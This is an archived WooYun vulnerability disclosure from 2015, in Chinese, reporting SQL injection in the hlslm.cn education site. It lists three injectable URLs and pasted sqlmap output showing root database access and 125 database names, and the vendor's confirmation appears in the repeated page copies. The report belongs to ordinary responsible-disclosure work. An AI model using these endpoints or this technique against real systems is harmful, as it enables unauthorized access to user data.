好老师联盟几处sql注入漏洞打包（root注入涉及125裤）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135497

漏洞标题：好老师联盟几处sql注入漏洞打包（root注入涉及125裤）

漏洞作者：牛小帅

提交时间：2015-08-20 10:18

修复时间：2015-10-04 11:50

公开时间：2015-10-04 11:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-20：细节已通知厂商并且等待厂商处理中
2015-08-20：厂商已经确认，细节仅向厂商公开
2015-08-30：细节向核心白帽子及相关领域专家公开
2015-09-09：细节向普通白帽子公开
2015-09-19：细节向实习白帽子公开
2015-10-04：细节向公众公开

简要描述：

又给我打包提交了

详细说明：

1.这个url可以注入
http://www.hlslm.cn/AboutMe/id/57/p_id/31/f_id/39
http://www.hlslm.cn/Content/uid/16863
http://www.hlslm.cn/AboutMe/id/35/p_id/30
2.直接丢sqlmap

[09:27:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:27:26] [INFO] fetching current user
current user:    'root@localhost'

available databases [125]:
[*] 021gaokao.com
[*] 16qianjin_2013
[*] 16qianjin_2013_2
[*] 21edu
[*] 21edu1
[*] 21edu2
[*] 21eedu
[*] 51qiuxue
[*] 52eedu
[*] 52qiuxue
[*] backup
[*] bbs_52qiuxue
[*] bbs_52qiuxue20150805
[*] bbs_52qiuxue_20150703
[*] bbs_52qiuxue_20150804
[*] bbs_52qiuxue_backup20150703
[*] bfdly.com
[*] bfdly.com_new
[*] bfdly_com
[*] ceqiuxue
[*] dedecmsv57utf8sp1
[*] destoon
[*] efyingyu.com
[*] gt.52qiuxue.com
[*] hangjinxue
[*] hdm0360223_db
[*] htlx.iacliuxue.net_new
[*] huatong.cliuxue.net
[*] huatong.iacliuxue.org
[*] huatongbefoundfcom
[*] huatongbefoundfcombak
[*] huatongbefoundfcombbak
[*] ihuatong.com
[*] information_schema
[*] jh.ydyjiajiao.org
[*] jinghan.zhilife.net
[*] jinghantj.com
[*] jingrui
[*] jingrui1v1.com
[*] jr.ydyfudao.com
[*] jztjy.cn
[*] luntan
[*] luntantest1011
[*] maisiling
[*] moban_huatong
[*] my021gaokao
[*] my97today
[*] mybtxueda
[*] mycdxueda
[*] mycqxueda
[*] myczxueda
[*] mydg-seiko
[*] mydgxueda
[*] mydlxueda
[*] myfsxueda
[*] myhhhtxueda
[*] myhuizxueda
[*] mymupingwang
[*] myncxueda
[*] mynjlvying
[*] mynnxueda
[*] myshjingh
[*] mysql
[*] mysql_log
[*] mysuzxueda
[*] mytyxueda
[*] mywinnetcap
[*] mywzxueda
[*] myxmxueda
[*] myxuedacs
[*] myxyxueda
[*] myytxueda
[*] nice
[*] njlvying.com
[*] novel
[*] phpcms
[*] ppc
[*] ppcall.befound.cn
[*] qdxueda.cn
[*] qiaowai
[*] qwiacliuxuenet
[*] ruisiyingyu.com
[*] sq_sinobm
[*] sunmax
[*] sunmaxtest
[*] szjuzhitang.com
[*] ultrax
[*] vip.befound.cn
[*] vzmer00376
[*] www.1v1buxi.net
[*] www.1v1buxi.org/huatong
[*] www.1v1buxi.org/zhongqing
[*] www.aicansi.com
[*] www.aicansi.com/huatong
[*] www.bf1v1.org
[*] www.bfdeu.com/zhongqing
[*] www.bfdeu.com/zhongqing2
[*] www.bliuxue.net
[*] www.cpbo.cn/huatong
[*] www.k12-edu.org/zhongqing
[*] www.libro.cn/huatong
[*] www.mupingwang.com
[*] www.qzj999.com/zhongqing
[*] www.sdfyme.com/huatong
[*] www.tzun.cn/zhongqing
[*] www.ydy114.org/huatong
[*] www_51fudao_org_xxq
[*] wwwchuguoyiminnet_qw
[*] wwwcnadicn_qw
[*] wwwedubuxnet
[*] wwwedupeixcom
[*] wwwedupeixcombak
[*] wwwgexingfudaonetjinghan
[*] wwwivcdcn_qiaowai
[*] wwwpcfmcn_qiaowai
[*] wwwssjzhcom_qiaowai
[*] xajuzhitang.com
[*] yuejiliuxue.com
[*] yzm_usercenter
[*] zgjhjy.zhilife.net
[*] zhishenghuo.org
[*] zjht.befoundg.com
[*] zjht.befoundg.com.bak
[*] zqsa
[*] zt00p1_db

[09:41:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:41:16] [INFO] fetching current user
[09:41:16] [INFO] retrieved:
[09:41:16] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[09:41:32] [INFO] adjusting time delay to 1 second due to good response times
root
[09:42:00] [ERROR] invalid character detected. retrying..
[09:42:00] [WARNING] increasing time delay to 2 seconds
@localhost
current user:    'root@localhost'

漏洞证明：

1.这个url可以注入
http://www.hlslm.cn/AboutMe/id/57/p_id/31/f_id/39
http://www.hlslm.cn/Content/uid/16863
http://www.hlslm.cn/AboutMe/id/35/p_id/30
2.直接丢sqlmap

[09:27:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:27:26] [INFO] fetching current user
current user:    'root@localhost'

available databases [125]:
[*] 021gaokao.com
[*] 16qianjin_2013
[*] 16qianjin_2013_2
[*] 21edu
[*] 21edu1
[*] 21edu2
[*] 21eedu
[*] 51qiuxue
[*] 52eedu
[*] 52qiuxue
[*] backup
[*] bbs_52qiuxue
[*] bbs_52qiuxue20150805
[*] bbs_52qiuxue_20150703
[*] bbs_52qiuxue_20150804
[*] bbs_52qiuxue_backup20150703
[*] bfdly.com
[*] bfdly.com_new
[*] bfdly_com
[*] ceqiuxue
[*] dedecmsv57utf8sp1
[*] destoon
[*] efyingyu.com
[*] gt.52qiuxue.com
[*] hangjinxue
[*] hdm0360223_db
[*] htlx.iacliuxue.net_new
[*] huatong.cliuxue.net
[*] huatong.iacliuxue.org
[*] huatongbefoundfcom
[*] huatongbefoundfcombak
[*] huatongbefoundfcombbak
[*] ihuatong.com
[*] information_schema
[*] jh.ydyjiajiao.org
[*] jinghan.zhilife.net
[*] jinghantj.com
[*] jingrui
[*] jingrui1v1.com
[*] jr.ydyfudao.com
[*] jztjy.cn
[*] luntan
[*] luntantest1011
[*] maisiling
[*] moban_huatong
[*] my021gaokao
[*] my97today
[*] mybtxueda
[*] mycdxueda
[*] mycqxueda
[*] myczxueda
[*] mydg-seiko
[*] mydgxueda
[*] mydlxueda
[*] myfsxueda
[*] myhhhtxueda
[*] myhuizxueda
[*] mymupingwang
[*] myncxueda
[*] mynjlvying
[*] mynnxueda
[*] myshjingh
[*] mysql
[*] mysql_log
[*] mysuzxueda
[*] mytyxueda
[*] mywinnetcap
[*] mywzxueda
[*] myxmxueda
[*] myxuedacs
[*] myxyxueda
[*] myytxueda
[*] nice
[*] njlvying.com
[*] novel
[*] phpcms
[*] ppc
[*] ppcall.befound.cn
[*] qdxueda.cn
[*] qiaowai
[*] qwiacliuxuenet
[*] ruisiyingyu.com
[*] sq_sinobm
[*] sunmax
[*] sunmaxtest
[*] szjuzhitang.com
[*] ultrax
[*] vip.befound.cn
[*] vzmer00376
[*] www.1v1buxi.net
[*] www.1v1buxi.org/huatong
[*] www.1v1buxi.org/zhongqing
[*] www.aicansi.com
[*] www.aicansi.com/huatong
[*] www.bf1v1.org
[*] www.bfdeu.com/zhongqing
[*] www.bfdeu.com/zhongqing2
[*] www.bliuxue.net
[*] www.cpbo.cn/huatong
[*] www.k12-edu.org/zhongqing
[*] www.libro.cn/huatong
[*] www.mupingwang.com
[*] www.qzj999.com/zhongqing
[*] www.sdfyme.com/huatong
[*] www.tzun.cn/zhongqing
[*] www.ydy114.org/huatong
[*] www_51fudao_org_xxq
[*] wwwchuguoyiminnet_qw
[*] wwwcnadicn_qw
[*] wwwedubuxnet
[*] wwwedupeixcom
[*] wwwedupeixcombak
[*] wwwgexingfudaonetjinghan
[*] wwwivcdcn_qiaowai
[*] wwwpcfmcn_qiaowai
[*] wwwssjzhcom_qiaowai
[*] xajuzhitang.com
[*] yuejiliuxue.com
[*] yzm_usercenter
[*] zgjhjy.zhilife.net
[*] zhishenghuo.org
[*] zjht.befoundg.com
[*] zjht.befoundg.com.bak
[*] zqsa
[*] zt00p1_db

[09:41:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:41:16] [INFO] fetching current user
[09:41:16] [INFO] retrieved:
[09:41:16] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[09:41:32] [INFO] adjusting time delay to 1 second due to good response times
root
[09:42:00] [ERROR] invalid character detected. retrying..
[09:42:00] [WARNING] increasing time delay to 2 seconds
@localhost
current user:    'root@localhost'

修复方案：

版权声明：转载请注明来源牛小帅@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-08-20 11:48

厂商回复：

thanks

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135497

漏洞标题：好老师联盟几处sql注入漏洞打包（root注入涉及125裤）

相关厂商：hlslm.cn

漏洞作者：牛小帅

提交时间：2015-08-20 10:18

修复时间：2015-10-04 11:50

公开时间：2015-10-04 11:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源牛小帅@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135497

漏洞标题：好老师联盟几处sql注入漏洞打包（root注入涉及125裤）

相关厂商：hlslm.cn

漏洞作者： 牛 小 帅

提交时间：2015-08-20 10:18

修复时间：2015-10-04 11:50

公开时间：2015-10-04 11:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0135497"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 牛 小 帅@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：牛小帅

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源牛小帅@乌云